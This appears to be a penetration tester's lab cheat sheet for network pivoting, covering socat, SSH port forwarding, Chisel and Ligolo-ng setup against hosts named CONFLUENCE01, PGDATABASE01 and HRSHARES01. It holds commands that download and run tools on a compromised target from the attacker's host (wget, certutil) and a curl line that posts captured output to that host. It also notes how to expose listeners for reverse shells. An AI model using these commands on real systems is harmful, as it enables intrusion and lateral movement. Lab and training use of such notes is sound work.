Linux

IMPORTANT NOTE

NOTE: REMEBER TO CHANGE THE PORT NUMBER IN /ETC/PROXYCHAINS TO KALI PORT YOU HAVE SET UP. (SAFEST IS TO KEEP ALL THE PORT THE SAME TO AVOID CONFUSION)

Socat

On CONFLUENCE01

socat -ddd TCP-LISTEN:<CONFLUENCE01 Port>,fork TPC:<PGDATABASE01 IP Address>:<PGDATABASE01 Port>

On Kali

Any commands running on Kali to be pointed to CONFLUENCE01 IP Address

SSH

SSH Local Tunneling

On CONFLUENCE01

ssh -N -L 0.0.0.0:<CONFLUENCE01 Port>:<HRSHARES01 IP Address>:<HRSHARES Port> <PGDATABASE01 Username>@<PGDATABASE01 IP Address>

On KALI

Any commands running on Kali to be pointed at CONFLUENCE01 IP Address

SSH Dynamic Tunneling

On CONFLUENCE01

ssh -N -D 0.0.0.0:<CONFLUENCE01 Port> <PGDATABASE01 Username>@<PGDATABASE01 IP Address>

On Kali

Any commands running on Kali to be pointed at HRSHARES01 IP Address via Proxychains

SSH Remote Port Forwarding

On CONFLUENCE01

ssh -N -R 127.0.0.1:<Kali Port>:<PGDATABASE01 IP Address>:<PGDATABASE01 Port> kali@<Kali IP Address>

On Kali

Any commands running on Kali to be pointed at Loopback address

SSH Remote Dynamic Port Forwarding

On CONFLUENCE01

ssh -N -R <Kali Port> kali@<Kali IP Address>

On Kali

Any commands running on Kali to be pointed at PGDATABASE01 IP Address

Chisel

On Kali

To start server

chisel server --port 8080 --reverse

To monitor network streams

sudo tcpdump -nvvvXi tun0 tcp port 8080

Any commands running on Kali to be pointed at PGDATABASE01 IP Address via Proxychains

On CONFLUENCE01

To install chisel on target machine

wget <Kali IP Address>/chisel -O /tmp/chisel && chmod +x /tmp/chisel

To port forward

/tmp/chisel client <Kali IP Address>:<Kali Port> R:socks > /dev/null 2>&1 &

To view the error output

/tmp/chisel client <Kail IP Address>:<Kali Port> R:socks &> /tmp/output; curl --data @/tmp/output http://<Kali IP Address>:<Kali Port>/

Ligolo-Ng

NOTE: When using nmap, add --unprivileged OR -PE to avoid false positives

Setup

On Kali

1

sudo ip tuntap add user kali mode tun ligolo
sudo ip link set ligolo up
sudo ip route add <Internal net>/24 dev ligolo

2

mkdir ligolo && cd ligolo

3

mkdir proxy && cd proxy
wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.7.5/ligolo-ng_proxy_0.7.5_linux_amd64.tar.gz
tar -xf ligolo-ng_proxy_0.7.5_linux_amd64.tar.gz && rm ligolo-ng_proxy_0.7.5_linux_amd64.tar.gz
cd ..

4

mkdir ../agents && cd ../agents
mkdir windows && cd windows
wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.7.5/ligolo-ng_agent_0.7.5_windows_amd64.zip
unzip ligolo-ng_agent_0.7.5_windows_amd64.zip && rm ligolo-ng_agent_0.7.5_windows_amd64.zip
cd ..

5

mkdir linux && cd linux
wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.7.5/ligolo-ng_agent_0.7.5_linux_amd64.tar.gz
tar -xf ligolo-ng_agent_0.7.5_linux_amd64.tar.gz && rm ligolo-ng_agent_0.7.5_linux_amd64.tar.gz
cd ..

6

python3 -m http.server 80

On Target Machine

certutil -urlcache -split -f http://<Kali IP Address>/<windows / linux>/agent.exe

Tunnel

On Kali

./proxy -selfcert

NOTE: Run the above command in /ligolo/proxy

On Target Machine

agent.exe -connect <Kali IP Address>:<Kali Listening port> -ignore-cert

NOTE: Once agent connects to server, return to Kali Machine and follow the steps in ligolo-ng console

session

<SELECT WHICH SESSION>

start

NOTE: Add the following if you want the internal to reach you. E.G. reverse shell

listener_add --addr 0.0.0.0:<Kali Port> --to 127.0.0.1:<Kali Port>

Verify

listener_list